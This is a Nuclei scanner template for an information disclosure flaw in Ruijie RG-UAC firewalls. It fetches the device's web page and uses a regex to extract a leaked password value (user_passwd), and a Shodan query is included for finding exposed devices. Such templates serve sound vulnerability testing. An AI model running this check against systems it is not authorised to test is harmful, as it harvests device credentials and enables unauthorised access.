nuclei-templates/vulnerabilities/ruijie/ruijie-password-leak.yaml

id: ruijie-password-leak

info:
  name: RG-UAC Ruijie Password Leak
  author: ritikchaddha
  severity: high
  description: Security Notice of Information Disclosure Vulnerability in Multiple Firewall Devices
  reference:
    - https://forum.butian.net/share/177
  metadata:
    shodan-query: http.html:"Get_Verify_Info"
  tags: password,leak,ruijie,exposure,firewall,router

requests:
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - 'user_passwd\/\*"([a-z0-9]+)"\*\/\);'

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        part: body
        group: 1
        regex:
          - 'user_passwd\/\*"([a-z0-9]+)"\*\/\);'